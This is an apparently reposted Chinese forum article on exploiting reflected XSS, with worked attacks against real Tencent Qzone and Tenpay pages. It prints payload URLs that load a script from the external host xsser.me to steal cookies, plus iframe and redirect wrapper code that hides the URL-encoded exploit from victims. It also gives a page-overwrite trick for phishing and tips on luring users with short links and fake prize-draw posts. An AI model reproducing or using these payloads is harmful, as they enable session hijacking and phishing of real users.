企业资讯
- 企业新闻
- 行业文章

漫谈反射xss利用

晚上无聊，没打草稿，想到哪，写到哪，凑合看吧.
先打个作者：Y35U

1，反射xss大吗？
反射xss相比flashxss和存储xss要多多了.
so对于用户基数越大的网站，反射xss的威力就越大
因为多嘛，所以利用者会大增。
再者，存储的封的会快，而反射的封的相对不及时。
xss中，普遍认为存储的危害最大，那是要看你X谁了
如果你要x管理员，那肯定是存储的危害大
如果你要x更多的人（跟你同等身份的访问者），存储的xss可以写蠕虫，效果明显，反射也可以，效果次之。
如果你要x指定的人（跟你同等身份的访问者），两者效果一样

再读读这个
http://www.wooyun.org/bugs/wooyun-2010-011192

2，怎么找反射xss？
典型的工具，比如
http://www.3hack.com/tools/DOMinatorPro%E7%A0%B4%E8%A7%A3%E7%89%88.txt
http://www.3hack.com/paper/DOMinator%E4%BD%BF%E7%94%A8%E5%AE%9E%E4%BE%8B-%E8%A7%86%E9%A2%91.txt
当然还有更多，比如BurpSuite的xsssacn插件，还有一些个人写的专业的工具.
所以反射xss叫只要神器在手，不怕xss没有了。
某牛说，不用工具，一天找tx的能找几十个.所以说，有技术真可怕。
3，如何把反射xss利用的“天衣无缝”？
反射跟存储的不同点在什么地方，我们要知道，只要能弥补掉反射的不完美之处，我们才好去处理。
0×1,浏览器的因素，浏览器对反射xss的影响是最大的解决:bypass各种浏览器，这是可以做到的。
0×2，反射的url容易被明眼人看出来解决：使用iframe框架，url跳转

4.能看看实际案例吗？？
A.
http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));”><img src=l onerror=
xxxxxx 原型

exp：

 http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&amp;uin=114967639));”&gt;&lt;img src=l onerror=e=document.createElement(‘script’);e.setAttribute(‘src’,'//xsser.me/9NkBwy?1353065417′)

1	http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));”><img src=l onerror=e=document.createElement(‘script’);e.setAttribute(‘src’,'//xsser.me/9NkBwy?1353065417′)

A-1
我们直接框架到wooyun.org/index.html页面（举个例子哦）
在index.html <body>标签内添加

 &lt;script&gt;  var exp=’%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%72%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29′;//上面EXP的完全RUL编码  urllll = unescape(exp); //解码  var e=document.createElement(‘iframe’);  e.width=1;  e.height=1;  e.setAttribute(‘src’,urllll);  document.body.appendChild(e);  &lt;/script&gt;

var exp=‘%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%72%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29′;//上面EXP的完全RUL编码

urllll = unescape(exp); //解码

var e=document.createElement(‘iframe’);

e.width=1;

e.height=1;

e.setAttribute(‘src’,urllll);

document.body.appendChild(e);

</script>

用户体验：wooyun.org，抓到cookies传送到xssserme

A-2
如果不容许iframe怎么办？即，iframe之后，会跳出该src页面，岂不是暴露了
那就跳转吧
EXP：

 http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&amp;uin=114967639));”&gt;&lt;img src=l onerror=e=document.createElement(‘script’);e.setAttribute(‘src’,'//xsser.me/9NkBwy?1353065417′);document.body.appendChild(e);&gt;&amp;jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639

1	http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));”><img src=l onerror=e=document.createElement(‘script’);e.setAttribute(‘src’,'//xsser.me/9NkBwy?1353065417′);document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639

对了一句document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639
这个你可以写进xsser.me的js里面，这样url就跟第一个exp一样了。作用就是跳到正常页面去

 &lt;script&gt;  var exp=’%68%74%74%70%3A%2F%2F%63%74%63%2E%71%7A%73%2E%71%71%2E%63%6F%6D%2F%71%7A%6F%6E%65%2F%76%36%2F%6E%65%77%6C%69%6D%69%74%2F%69%6E%64%65%78%2E%68%74%6D%6C%3F%73%3D%31%26%75%69%6E%3D%31%31%34%39%36%37%36%33%39%29%29%3B%22%3E%3C%69%6D%67%20%73%72%63%3D%6C%20%6F%6E%65%72%72%6F%72%3D%65%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%65%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%27%2F%2F%78%73%73%65%72%2E%6D%65%2F%39%4E%6B%42%77%79%3F%31%33%35%33%30%36%35%34%31%37%27%29′;  urllll = unescape(exp); //解码  window.location.href=urllll;//跳

urllll = unescape(exp); //解码

window.location.href=urllll;//跳

用户体验：wooyun.org，跳转到exp地址，再跳到正常页面，因为exp地址跟正常页面地址变化是最后面，跳的也很快，不是技术型的，看不出来，

B.
如果exp不通用，就是要针对ie9，FF有不同的exp
也很简单，ie8，ie9，chrome bypass这样的文章很多，可以看看
那我们要做的就是
iframe exp.js // exp.js负责判断浏览器版本，然后根据不同版本，输出不同的exp，针对打击
跟上面的A案例相比，就多一段js代码，即判断浏览器版本
要多写几个exp，跟A案例一样的形式，针对浏览器主要的有IE8.IE9.火狐.chrome.other（比如360.搜狗,都是用的ie内核）
把exp.js写成通用的，以后你有其他exp的时候，只需替换exp，就不用没次都写代码了，一劳永逸啊。
我写的给朋友看了，人家说非常烂，就不亮了，丢人。
C.
如果有一个完美的iframe xss，钓鱼的成功率相当之高
http://baoxian.tenpay.com/zhongmin.shtml?redirecturl=http://xj.hk/tenpay/
可以把http://xj.hk/tenpay/用tx微博短地址加密一下。
当然，这个xss也可以去用javascript去抓cookies，但是我觉得钓鱼的危害更大！
当时测试，两用型，如果你害怕对手不上当，可以借鉴案例A去抓cookies ，如果你觉得对手是小白
这个钓鱼的成功率是相当之高
D.
你即要抓cookies，又要钓鱼（太狠了点）
这样就有冲突，因为抓cookies的要点是当前url是其他网站，只是框架了tx的地址
而钓鱼，则必须url是tx的地址，才可信
所为鱼和胸罩不可得兼、
如果都是是纯小白，url又长，倒是可以试试
做起来很简单，比如案例A来说

在xsserme的js加上

 top.document.body.innerHTML=”&lt;iframe width=100% height=100% frameborder=0 scrolling=no style=position:absolute;left:0;top:0 src=https://static-js.b0.upaiyun.com/wp-content/uploads/auto_save_image/2012/12/034610c5P.jpg”;

1	top.document.body.innerHTML=“<iframe width=100% height=100% frameborder=0 scrolling=no style=position:absolute;left:0;top:0 src=https://static-js.b0.upaiyun.com/wp-content/uploads/auto_save_image/2012/12/034610c5P.jpg”;

做法跟A-2一样，用调转，比如，标题写着，tx抽奖活动，百分百中奖，大家快去领

把wooyun.org用tx短网址加密，或者直接发微博吧。。。

访问短网址之后，会二级跳到xss地址

这个时候，执行了xssserme的js，先抓了cookies，又重写了页面……………

好了，暂时想到这么多，下回再写哈

link:http://zone.wooyun.org/content/1949

编辑点评：这是一篇不错的反射型xss科普文，作者对反射型xss做了一个很详细的利用总结。

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。

鸿大千秋网站建设团队敬上